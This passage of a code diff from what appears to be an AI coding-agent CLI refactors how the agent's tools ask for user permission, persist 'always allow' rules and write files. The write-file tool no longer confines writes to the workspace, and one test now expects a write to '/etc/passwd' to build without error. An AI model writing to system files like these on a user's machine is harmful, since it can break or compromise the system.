ToolConfirmationPayload, + ) => { + // No-op: persistence is handled by coreToolScheduler via PM rules + }, + }; + return Promise.resolve(details); } abstract execute( @@ -447,7 +492,7 @@ export interface TaskResultDisplay { status: 'running' | 'completed' | 'failed' | 'cancelled'; terminateReason?: string; result?: string; - executionSummary?: SubagentStatsSummary; + executionSummary?: AgentStatsSummary; // If the subagent is awaiting approval for a tool call, // this contains the confirmation details for inline UI rendering. @@ -525,6 +570,7 @@ export interface PlanResultDisplay { type: 'plan_summary'; message: string; plan: string; + rejected?: boolean; } export interface ToolEditConfirmationDetails { @@ -534,6 +580,12 @@ export interface ToolEditConfirmationDetails { outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, ) => Promise; + /** + * When true, the UI should not show "Always allow" options (ProceedAlwaysProject/User). + * Set by coreToolScheduler when PM has an explicit 'ask' rule that would override + * any 'allow' rule the user might add. + */ + hideAlwaysAllow?: boolean; fileName: string; filePath: string; fileDiff: string; @@ -549,6 +601,10 @@ export interface ToolConfirmationPayload { newContent?: string; // used to provide custom cancellation message when outcome is Cancel cancelMessage?: string; + // Permission rules to persist when user selects ProceedAlwaysProject/User. + // Populated by the tool's getConfirmationDetails() and read by + // coreToolScheduler.handleConfirmationResponse() for persistence. + permissionRules?: string[]; // used to pass user answers from ask_user_question tool answers?: Record; } @@ -560,13 +616,19 @@ export interface ToolExecuteConfirmationDetails { outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, ) => Promise; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; command: string; rootCommand: string; + /** Permission rules extracted by extractCommandRules(), used for display and persistence. */ + permissionRules?: string[]; } export interface ToolMcpConfirmationDetails { type: 'mcp'; title: string; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; serverName: string; toolName: string; toolDisplayName: string; @@ -574,14 +636,23 @@ export interface ToolMcpConfirmationDetails { outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, ) => Promise; + /** Permission rule for this MCP tool, e.g. 'mcp__server__tool'. */ + permissionRules?: string[]; } export interface ToolInfoConfirmationDetails { type: 'info'; title: string; - onConfirm: (outcome: ToolConfirmationOutcome) => Promise; + onConfirm: ( + outcome: ToolConfirmationOutcome, + payload?: ToolConfirmationPayload, + ) => Promise; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; prompt: string; urls?: string[]; + /** Permission rules for persistence, e.g. 'WebFetch(example.com)'. */ + permissionRules?: string[]; } export type ToolCallConfirmationDetails = @@ -595,8 +666,13 @@ export type ToolCallConfirmationDetails = export interface ToolPlanConfirmationDetails { type: 'plan'; title: string; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; plan: string; - onConfirm: (outcome: ToolConfirmationOutcome) => Promise; + onConfirm: ( + outcome: ToolConfirmationOutcome, + payload?: ToolConfirmationPayload, + ) => Promise; } export interface ToolAskUserQuestionConfirmationDetails { @@ -628,8 +704,14 @@ export interface ToolAskUserQuestionConfirmationDetails { export enum ToolConfirmationOutcome { ProceedOnce = 'proceed_once', ProceedAlways = 'proceed_always', + /** @deprecated Use ProceedAlwaysProject or ProceedAlwaysUser instead. */ ProceedAlwaysServer = 'proceed_always_server', + /** @deprecated Use ProceedAlwaysProject or ProceedAlwaysUser instead. */ ProceedAlwaysTool = 'proceed_always_tool', + /** Persist the permission rule to the project settings (workspace scope). */ + ProceedAlwaysProject = 'proceed_always_project', + /** Persist the permission rule to the user settings (user scope). */ + ProceedAlwaysUser = 'proceed_always_user', ModifyWithEditor = 'modify_with_editor', Cancel = 'cancel', } diff --git a/packages/core/src/tools/web-fetch.test.ts b/packages/core/src/tools/web-fetch.test.ts index cfa7b593d..93ef2826e 100644 --- a/packages/core/src/tools/web-fetch.test.ts +++ b/packages/core/src/tools/web-fetch.test.ts @@ -77,7 +77,7 @@ describe('WebFetchTool', () => { }); }); - describe('shouldConfirmExecute', () => { + describe('getConfirmationDetails', () => { it('should return confirmation details with the correct prompt and urls', async () => { const tool = new WebFetchTool(mockConfig); const params = { @@ -85,7 +85,9 @@ describe('WebFetchTool', () => { prompt: 'summarize this page', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); @@ -95,6 +97,7 @@ describe('WebFetchTool', () => { prompt: 'Fetch content from https://example.com and process with: summarize this page', urls: ['https://example.com'], + permissionRules: ['WebFetch(example.com)'], onConfirm: expect.any(Function), }); }); @@ -106,7 +109,9 @@ describe('WebFetchTool', () => { prompt: 'summarize the README', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); @@ -116,11 +121,12 @@ describe('WebFetchTool', () => { prompt: 'Fetch content from https://github.com/google/gemini-react/blob/main/README.md and process with: summarize the README', urls: ['https://github.com/google/gemini-react/blob/main/README.md'], + permissionRules: ['WebFetch(github.com)'], onConfirm: expect.any(Function), }); }); - it('should return false if approval mode is AUTO_EDIT', async () => { + it('should return ask even if approval mode is AUTO_EDIT (approval mode handled by scheduler)', async () => { const tool = new WebFetchTool({ ...mockConfig, getApprovalMode: () => ApprovalMode.AUTO_EDIT, @@ -130,14 +136,24 @@ describe('WebFetchTool', () => { prompt: 'summarize this page', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmationDetails).toBe(false); + expect(confirmationDetails).toEqual({ + type: 'info', + title: 'Confirm Web Fetch', + prompt: + 'Fetch content from https://example.com and process with: summarize this page', + urls: ['https://example.com'], + permissionRules: ['WebFetch(example.com)'], + onConfirm: expect.any(Function), + }); }); - it('should call setApprovalMode when onConfirm is called with ProceedAlways', async () => { + it('should have onConfirm as a no-op (approval mode handled by scheduler)', async () => { const setApprovalMode = vi.fn(); const testConfig = { ...mockConfig, @@ -149,7 +165,7 @@ describe('WebFetchTool', () => { prompt: 'summarize this page', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); @@ -163,7 +179,8 @@ describe('WebFetchTool', () => { ); } - expect(setApprovalMode).toHaveBeenCalledWith(ApprovalMode.AUTO_EDIT); + // setApprovalMode should NOT be called — onConfirm is a no-op + expect(setApprovalMode).not.toHaveBeenCalled(); }); }); }); diff --git a/packages/core/src/tools/web-fetch.ts b/packages/core/src/tools/web-fetch.ts index 8240770d2..c0d04aed6 100644 --- a/packages/core/src/tools/web-fetch.ts +++ b/packages/core/src/tools/web-fetch.ts @@ -7,7 +7,6 @@ import { convert } from 'html-to-text'; import { ProxyAgent, setGlobalDispatcher } from 'undici'; import type { Config } from '../config/config.js'; -import { ApprovalMode } from '../config/config.js'; import { fetchWithTimeout, isPrivateIp } from '../utils/fetch.js'; import { getResponseText } from '../utils/partUtils.js'; import { ToolErrorType } from './tool-error.js'; @@ -15,13 +14,11 @@ import type { ToolCallConfirmationDetails, ToolInvocation, ToolResult, -} from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, - Kind, + ToolConfirmationPayload, ToolConfirmationOutcome, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { DEFAULT_QWEN_MODEL } from '../config/models.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; import { createDebugLogger, type DebugLogger } from '../utils/debugLogger.js'; @@ -151,26 +148,40 @@ ${textContent} return `Fetching content from ${this.params.url} and processing with prompt: "${displayPrompt}"`; } - override async shouldConfirmExecute(): Promise< - ToolCallConfirmationDetails | false - > { - // Auto-execute in AUTO_EDIT mode and PLAN mode (read-only tool) - if ( - this.config.getApprovalMode() === ApprovalMode.AUTO_EDIT || - this.config.getApprovalMode() === ApprovalMode.PLAN - ) { - return false; + /** + * WebFetch is a read-like tool (fetches content) but requires confirmation + * because it makes external network requests. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + /** + * Constructs the web fetch confirmation details. + */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { + // Extract the domain for the permission rule. + let domain: string; + try { + domain = new URL(this.params.url).hostname; + } catch { + domain = this.params.url; } + const permissionRules = [`WebFetch(${domain})`]; const confirmationDetails: ToolCallConfirmationDetails = { type: 'info', title: `Confirm Web Fetch`, prompt: `Fetch content from ${this.params.url} and process with: ${this.params.prompt}`, urls: [this.params.url], - onConfirm: async (outcome: ToolConfirmationOutcome) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - this.config.setApprovalMode(ApprovalMode.AUTO_EDIT); - } + permissionRules, + onConfirm: async ( + _outcome: ToolConfirmationOutcome, + _payload?: ToolConfirmationPayload, + ) => { + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; diff --git a/packages/core/src/tools/web-search/index.ts b/packages/core/src/tools/web-search/index.ts index f8fcb8c60..142dd880f 100644 --- a/packages/core/src/tools/web-search/index.ts +++ b/packages/core/src/tools/web-search/index.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type { ToolConfirmationOutcome } from '../tools.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -11,12 +12,12 @@ import { type ToolInvocation, type ToolCallConfirmationDetails, type ToolInfoConfirmationDetails, - ToolConfirmationOutcome, + type ToolConfirmationPayload, } from '../tools.js'; +import type { PermissionDecision } from '../../permissions/types.js'; import { ToolErrorType } from '../tool-error.js'; import type { Config } from '../../config/config.js'; -import { ApprovalMode } from '../../config/config.js'; import { getErrorMessage } from '../../utils/errors.js'; import { createDebugLogger } from '../../utils/debugLogger.js'; import { buildContentWithSources } from './utils.js'; @@ -55,25 +56,32 @@ class WebSearchToolInvocation extends BaseToolInvocation< return ` (Searching the web via ${provider})`; } - override async shouldConfirmExecute( + /** + * WebSearch requires confirmation for external network requests. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + /** + * Constructs the web search confirmation details. + */ + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { - // Auto-execute in AUTO_EDIT mode and PLAN mode (read-only tool) - if ( - this.config.getApprovalMode() === ApprovalMode.AUTO_EDIT || - this.config.getApprovalMode() === ApprovalMode.PLAN - ) { - return false; - } + ): Promise { + // Extract the domain for the permission rule. + const permissionRules = [`WebSearch`]; const confirmationDetails: ToolInfoConfirmationDetails = { type: 'info', title: 'Confirm Web Search', prompt: `Search the web for: "${this.params.query}"`, - onConfirm: async (outcome: ToolConfirmationOutcome) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - this.config.setApprovalMode(ApprovalMode.AUTO_EDIT); - } + permissionRules, + onConfirm: async ( + _outcome: ToolConfirmationOutcome, + _payload?: ToolConfirmationPayload, + ) => { + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; diff --git a/packages/core/src/tools/write-file.test.ts b/packages/core/src/tools/write-file.test.ts index 057eb33dd..f4808cdc0 100644 --- a/packages/core/src/tools/write-file.test.ts +++ b/packages/core/src/tools/write-file.test.ts @@ -151,15 +151,14 @@ describe('WriteFileTool', () => { expect(() => tool.build(params)).toThrow(/File path must be absolute/); }); - it('should throw an error for a path outside root', () => { + it('should allow a path outside root (external path support)', () => { const outsidePath = path.resolve(tempDir, 'outside-root.txt'); const params = { file_path: outsidePath, content: 'hello', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); it('should throw an error if path is a directory', () => { @@ -196,7 +195,15 @@ describe('WriteFileTool', () => { describe('shouldConfirmExecute', () => { const abortSignal = new AbortController().signal; - it('should return false if _getCorrectedFileContent returns an error', async () => { + it('should always return ask from getDefaultPermission', async () => { + const filePath = path.join(rootDir, 'confirm_permission_file.txt'); + const params = { file_path: filePath, content: 'test content' }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + }); + + it('should throw if _getCorrectedFileContent returns an error', async () => { const filePath = path.join(rootDir, 'confirm_error_file.txt'); const params = { file_path: filePath, content: 'test content' }; fs.writeFileSync(filePath, 'original', { mode: 0o000 }); @@ -207,39 +214,20 @@ describe('WriteFileTool', () => { ); const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(abortSignal); - expect(confirmation).toBe(false); + await expect( + invocation.getConfirmationDetails(abortSignal), + ).rejects.toThrow('Error reading existing file for confirmation'); fs.chmodSync(filePath, 0o600); }); - it('should return false and skip confirmation when approval mode is AUTO_EDIT', async () => { - mockConfigInternal.getApprovalMode.mockReturnValue( - ApprovalMode.AUTO_EDIT, - ); - const filePath = path.join(rootDir, 'auto_edit_skip_confirm.txt'); - const params = { file_path: filePath, content: 'content' }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(abortSignal); - expect(confirmation).toBe(false); - }); - - it('should return false and skip confirmation when approval mode is YOLO', async () => { - mockConfigInternal.getApprovalMode.mockReturnValue(ApprovalMode.YOLO); - const filePath = path.join(rootDir, 'yolo_skip_confirm.txt'); - const params = { file_path: filePath, content: 'content' }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(abortSignal); - expect(confirmation).toBe(false); - }); - it('should request confirmation with diff for a new file', async () => { const filePath = path.join(rootDir, 'confirm_new_file.txt'); const proposedContent = 'Proposed new content for confirmation.'; const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -266,7 +254,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -298,7 +286,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: 'test' }; const invocation = tool.build(params); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -317,7 +305,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: 'test' }; const invocation = tool.build(params); - await invocation.shouldConfirmExecute(abortSignal); + await invocation.getConfirmationDetails(abortSignal); expect(mockIdeClient.openDiff).not.toHaveBeenCalled(); }); @@ -328,7 +316,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: 'test' }; const invocation = tool.build(params); - await invocation.shouldConfirmExecute(abortSignal); + await invocation.getConfirmationDetails(abortSignal); expect(mockIdeClient.openDiff).not.toHaveBeenCalled(); }); @@ -339,7 +327,7 @@ describe('WriteFileTool', () => { const invocation = tool.build(params); // This is the key part: get the confirmation details - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -367,7 +355,7 @@ describe('WriteFileTool', () => { }); mockIdeClient.openDiff.mockReturnValue(diffPromise); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -425,7 +413,8 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmDetails = await invocation.shouldConfirmExecute(abortSignal); + const confirmDetails = + await invocation.getConfirmationDetails(abortSignal); if ( typeof confirmDetails === 'object' && 'onConfirm' in confirmDetails && @@ -462,7 +451,8 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmDetails = await invocation.shouldConfirmExecute(abortSignal); + const confirmDetails = + await invocation.getConfirmationDetails(abortSignal); if ( typeof confirmDetails === 'object' && 'onConfirm' in confirmDetails && @@ -526,7 +516,8 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content }; const invocation = tool.build(params); // Simulate confirmation if your logic requires it before execute, or remove if not needed for this path - const confirmDetails = await invocation.shouldConfirmExecute(abortSignal); + const confirmDetails = + await invocation.getConfirmationDetails(abortSignal); if ( typeof confirmDetails === 'object' && 'onConfirm' in confirmDetails && @@ -597,14 +588,13 @@ describe('WriteFileTool', () => { expect(() => tool.build(params)).not.toThrow(); }); - it('should reject paths outside workspace root', () => { + it('should allow paths outside workspace root (external path support)', () => { const params = { file_path: '/etc/passwd', - content: 'malicious', + content: 'test', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); }); diff --git a/packages/core/src/tools/write-file.ts b/packages/core/src/tools/write-file.ts index 9da02e4d4..1f1a30cdd 100644 --- a/packages/core/src/tools/write-file.ts +++ b/packages/core/src/tools/write-file.ts @@ -17,6 +17,7 @@ import type { ToolLocation, ToolResult, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -24,7 +25,7 @@ import { ToolConfirmationOutcome, } from './tools.js'; import { ToolErrorType } from './tool-error.js'; -import { FileEncoding } from '../services/fileSystemService.js'; +import { FileEncoding, needsUtf8Bom } from '../services/fileSystemService.js'; import { makeRelative, shortenPath } from '../utils/paths.js'; import { getErrorMessage, isNodeError } from '../utils/errors.js'; import { DEFAULT_DIFF_OPTIONS, getDiffStat } from './diffOptions.js'; @@ -94,14 +95,19 @@ class WriteFileToolInvocation extends BaseToolInvocation< return `Writing to ${shortenPath(relativePath)}`; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - const mode = this.config.getApprovalMode(); - if (mode === ApprovalMode.AUTO_EDIT || mode === ApprovalMode.YOLO) { - return false; - } + /** + * Write operations always need user confirmation. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + /** + * Constructs the write-file diff confirmation details. + */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { let originalContent = ''; const fileExists = await isFilefileExists(this.params.file_path); if (fileExists) { @@ -111,12 +117,12 @@ class WriteFileToolInvocation extends BaseToolInvocation< .readTextFile({ path: this.params.file_path }); originalContent = content; } catch (err) { - debugLogger.error( + throw new Error( `Error reading existing file for confirmation: ${getErrorMessage(err)}`, ); - return false; } } + const relativePath = makeRelative( this.params.file_path, this.config.getTargetDir(), @@ -212,7 +218,17 @@ class WriteFileToolInvocation extends BaseToolInvocation< if (!fileExists) { fs.mkdirSync(dirName, { recursive: true }); - useBOM = this.config.getDefaultFileEncoding() === FileEncoding.UTF8_BOM; + const userEncoding = this.config.getDefaultFileEncoding(); + if (userEncoding === FileEncoding.UTF8_BOM) { + // User explicitly configured UTF-8 BOM for all new files + useBOM = true; + } else if (userEncoding === undefined) { + // No explicit setting: auto-detect based on platform/extension. + // e.g. .ps1 on Windows with a non-UTF-8 code page needs BOM so + // PowerShell 5.1 reads the file as UTF-8 instead of the system ANSI page + useBOM = needsUtf8Bom(file_path); + } + // else: user explicitly set 'utf-8' (no BOM) — respect it detectedEncoding = undefined; } @@ -385,14 +401,6 @@ export class WriteFileTool return `File path must be absolute: ${filePath}`; } - const workspaceContext = this.config.getWorkspaceContext(); - if (!workspaceContext.isPathWithinWorkspace(filePath)) { - const directories = workspaceContext.getDirectories(); - return `File path must be within one of the workspace directories: ${directories.join( - ', ', - )}`; - } - try { if (fs.existsSync(filePath)) { const stats = fs.lstatSync(filePath); diff --git a/packages/core/src/utils/asyncMessageQueue.test.ts b/packages/core/src/utils/asyncMessageQueue.test.ts new file mode 100644 index 000000000..fe5421033 --- /dev/null +++ b/packages/core/src/utils/asyncMessageQueue.test.ts @@ -0,0 +1,75 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect } from 'vitest'; +import { AsyncMessageQueue } from './asyncMessageQueue.js'; + +describe('AsyncMessageQueue', () => { + it('should dequeue items in FIFO order', () => { + const queue = new AsyncMessageQueue(); + queue.enqueue('a'); + queue.enqueue('b'); + queue.enqueue('c'); + + expect(queue.dequeue()).toBe('a'); + expect(queue.dequeue()).toBe('b'); + expect(queue.dequeue()).toBe('c'); + }); + + it('should return null when empty', () => { + const queue = new AsyncMessageQueue(); + expect(queue.dequeue()).toBeNull(); + }); + + it('should return remaining items then null after drain()', () => { + const queue = new AsyncMessageQueue(); + queue.enqueue('x'); + queue.enqueue('y'); + + queue.drain(); + + expect(queue.dequeue()).toBe('x'); + expect(queue.dequeue()).toBe('y'); + expect(queue.dequeue()).toBeNull(); + }); + + it('should silently drop items enqueued after drain()', () => { + const queue = new AsyncMessageQueue(); + queue.drain(); + queue.enqueue('dropped'); + + expect(queue.size).toBe(0); + }); + + it('should track size accurately', () => { + const queue = new AsyncMessageQueue(); + expect(queue.size).toBe(0); + + queue.enqueue(1); + queue.enqueue(2); + expect(queue.size).toBe(2); + + queue.dequeue(); + expect(queue.size).toBe(1); + }); + + it('should report isDrained correctly', () => { + const queue = new AsyncMessageQueue(); + expect(queue.isDrained).toBe(false); + + queue.drain(); + expect(queue.isDrained).toBe(true); + }); + + it('should handle multiple sequential enqueue-dequeue cycles', () => { + const queue = new AsyncMessageQueue(); + + for (let i = 0; i < 5; i++) { + queue.enqueue(i); + expect(queue.dequeue()).toBe(i); + } + }); +}); diff --git a/packages/core/src/utils/asyncMessageQueue.ts b/packages/core/src/utils/asyncMessageQueue.ts new file mode 100644 index 000000000..3268718ef --- /dev/null +++ b/packages/core/src/utils/asyncMessageQueue.ts @@ -0,0 +1,54 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Generic non-blocking message queue. + * + * Simple FIFO queue for producer/consumer patterns. Dequeue is + * non-blocking — returns null when empty. The consumer decides + * when and how to process items. + */ + +/** + * A generic non-blocking message queue. + * + * - `enqueue(item)` adds an item. Silently dropped after `drain()`. + * - `dequeue()` returns the next item, or `null` if empty. + * - `drain()` signals that no more items will be enqueued. + */ +export class AsyncMessageQueue { + private items: T[] = []; + private drained = false; + + /** Add an item to the queue. Dropped silently after drain. */ + enqueue(item: T): void { + if (this.drained) return; + this.items.push(item); + } + + /** Remove and return the next item, or null if empty. */ + dequeue(): T | null { + if (this.items.length > 0) { + return this.items.shift()!; + } + return null; + } + + /** Signal that no more items will be enqueued. */ + drain(): void { + this.drained = true; + } + + /** Number of items currently in the queue. */ + get size(): number { + return this.items.length; + } + + /** Whether `drain()` has been called. */ + get isDrained(): boolean { + return this.drained; + } +} diff --git a/packages/core/src/utils/atomicFileWrite.test.ts b/packages/core/src/utils/atomicFileWrite.test.ts new file mode 100644 index 000000000..7d30caed0 --- /dev/null +++ b/packages/core/src/utils/atomicFileWrite.test.ts @@ -0,0 +1,63 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { atomicWriteJSON } from './atomicFileWrite.js'; + +describe('atomicWriteJSON', () => { + let tmpDir: string; + + beforeEach(async () => { + tmpDir = await fs.mkdtemp(path.join(os.tmpdir(), 'atomic-write-test-')); + }); + + afterEach(async () => { + await fs.rm(tmpDir, { recursive: true, force: true }); + }); + + it('should write valid JSON to the target file', async () => { + const filePath = path.join(tmpDir, 'test.json'); + const data = { hello: 'world', count: 42 }; + + await atomicWriteJSON(filePath, data); + + const content = await fs.readFile(filePath, 'utf-8'); + expect(JSON.parse(content)).toEqual(data); + }); + + it('should pretty-print with 2-space indent', async () => { + const filePath = path.join(tmpDir, 'test.json'); + await atomicWriteJSON(filePath, { a: 1 }); + + const content = await fs.readFile(filePath, 'utf-8'); + expect(content).toBe(JSON.stringify({ a: 1 }, null, 2)); + }); + + it('should overwrite existing file atomically', async () => { + const filePath = path.join(tmpDir, 'test.json'); + await atomicWriteJSON(filePath, { version: 1 }); + await atomicWriteJSON(filePath, { version: 2 }); + + const content = await fs.readFile(filePath, 'utf-8'); + expect(JSON.parse(content)).toEqual({ version: 2 }); + }); + + it('should not leave temp files on success', async () => { + const filePath = path.join(tmpDir, 'test.json'); + await atomicWriteJSON(filePath, { ok: true }); + + const files = await fs.readdir(tmpDir); + expect(files).toEqual(['test.json']); + }); + + it('should throw if parent directory does not exist', async () => { + const filePath = path.join(tmpDir, 'nonexistent', 'test.json'); + await expect(atomicWriteJSON(filePath, {})).rejects.toThrow(); + }); +}); diff --git a/packages/core/src/utils/atomicFileWrite.ts b/packages/core/src/utils/atomicFileWrite.ts new file mode 100644 index 000000000..e79a05738 --- /dev/null +++ b/packages/core/src/utils/atomicFileWrite.ts @@ -0,0 +1,72 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as crypto from 'node:crypto'; +import * as fs from 'node:fs/promises'; +import { isNodeError } from './errors.js'; + +export interface AtomicWriteOptions { + /** Number of rename retries on EPERM/EACCES (default: 3). */ + retries?: number; + /** Base delay in ms for exponential backoff (default: 50). */ + delayMs?: number; +} + +/** + * Atomically write a JSON value to a file. + * + * Writes to a temporary file first, then renames it to the target path. + * On POSIX `fs.rename` is atomic, so readers never see a partial file. + * On Windows the rename can fail with EPERM under concurrent access, + * so we retry with exponential backoff. + * + * The parent directory of `filePath` must already exist. + */ +export async function atomicWriteJSON( + filePath: string, + data: unknown, + options?: AtomicWriteOptions, +): Promise { + const retries = options?.retries ?? 3; + const delayMs = options?.delayMs ?? 50; + + const tmpPath = `${filePath}.${crypto.randomBytes(4).toString('hex')}.tmp`; + try { + await fs.writeFile(tmpPath, JSON.stringify(data, null, 2), 'utf-8'); + await renameWithRetry(tmpPath, filePath, retries, delayMs); + } catch (error) { + try { + await fs.unlink(tmpPath); + } catch { + // Ignore cleanup errors + } + throw error; + } +} + +async function renameWithRetry( + src: string, + dest: string, + retries: number, + delayMs: number, +): Promise { + for (let attempt = 0; attempt <= retries; attempt++) { + try { + await fs.rename(src, dest); + return; + } catch (error: unknown) { + const isRetryable = + isNodeError(error) && + (error.code === 'EPERM' || error.code === 'EACCES'); + if (!isRetryable || attempt === retries) { + throw error; + } + await new Promise((resolve) => + setTimeout(resolve, delayMs * 2 ** attempt), + ); + } + } +} diff --git a/packages/core/src/utils/environmentContext.test.ts b/packages/core/src/utils/environmentContext.test.ts index 0b24a9b01..6c2258c78 100644 --- a/packages/core/src/utils/environmentContext.test.ts +++ b/packages/core/src/utils/environmentContext.test.ts @@ -18,6 +18,7 @@ import { getEnvironmentContext, getDirectoryContextString, getInitialChatHistory, + stripStartupContext, } from './environmentContext.js'; import type { Config } from '../config/config.js'; import { getFolderStructure } from './getFolderStructure.js'; @@ -223,3 +224,76 @@ describe('getInitialChatHistory', () => { expect(history).toEqual([]); }); }); + +describe('stripStartupContext', () => { + it('should strip the env context + model ack from the start of history', () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'This is the Qwen Code...' }] }, + { + role: 'model', + parts: [{ text: 'Got it. Thanks for the context!' }], + }, + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi there' }] }, + ]; + + const result = stripStartupContext(history); + expect(result).toEqual([ + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi there' }] }, + ]); + }); + + it('should return history unchanged when no startup context is present', () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi there' }] }, + ]; + + const result = stripStartupContext(history); + expect(result).toEqual(history); + }); + + it('should return empty array when history is only the startup context', () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'This is the Qwen Code...' }] }, + { + role: 'model', + parts: [{ text: 'Got it. Thanks for the context!' }], + }, + ]; + + const result = stripStartupContext(history); + expect(result).toEqual([]); + }); + + it('should return history unchanged when it has fewer than 2 entries', () => { + expect(stripStartupContext([])).toEqual([]); + expect( + stripStartupContext([{ role: 'user', parts: [{ text: 'Hello' }] }]), + ).toEqual([{ role: 'user', parts: [{ text: 'Hello' }] }]); + }); + + it('should round-trip with getInitialChatHistory', async () => { + const mockConfig = { + getSkipStartupContext: vi.fn().mockReturnValue(false), + getWorkspaceContext: vi.fn().mockReturnValue({ + getDirectories: vi.fn().mockReturnValue(['/test/dir']), + }), + getFileService: vi.fn(), + }; + + const conversation: Content[] = [ + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi' }] }, + ]; + + const withStartup = await getInitialChatHistory( + mockConfig as unknown as Config, + conversation, + ); + const stripped = stripStartupContext(withStartup); + + expect(stripped).toEqual(conversation); + }); +}); diff --git a/packages/core/src/utils/environmentContext.ts b/packages/core/src/utils/environmentContext.ts index 4f5c03209..4d6fe0ab7 100644 --- a/packages/core/src/utils/environmentContext.ts +++ b/packages/core/src/utils/environmentContext.ts @@ -69,6 +69,8 @@ ${directoryContext} return [{ text: context }]; } +const STARTUP_CONTEXT_MODEL_ACK = 'Got it. Thanks for the context!'; + export async function getInitialChatHistory( config: Config, extraHistory?: Content[], @@ -87,8 +89,26 @@ export async function getInitialChatHistory( }, { role: 'model', - parts: [{ text: 'Got it. Thanks for the context!' }], + parts: [{ text: STARTUP_CONTEXT_MODEL_ACK }], }, ...(extraHistory ?? []), ]; } + +/** + * Strip the leading startup context (env-info user message + model ack) + 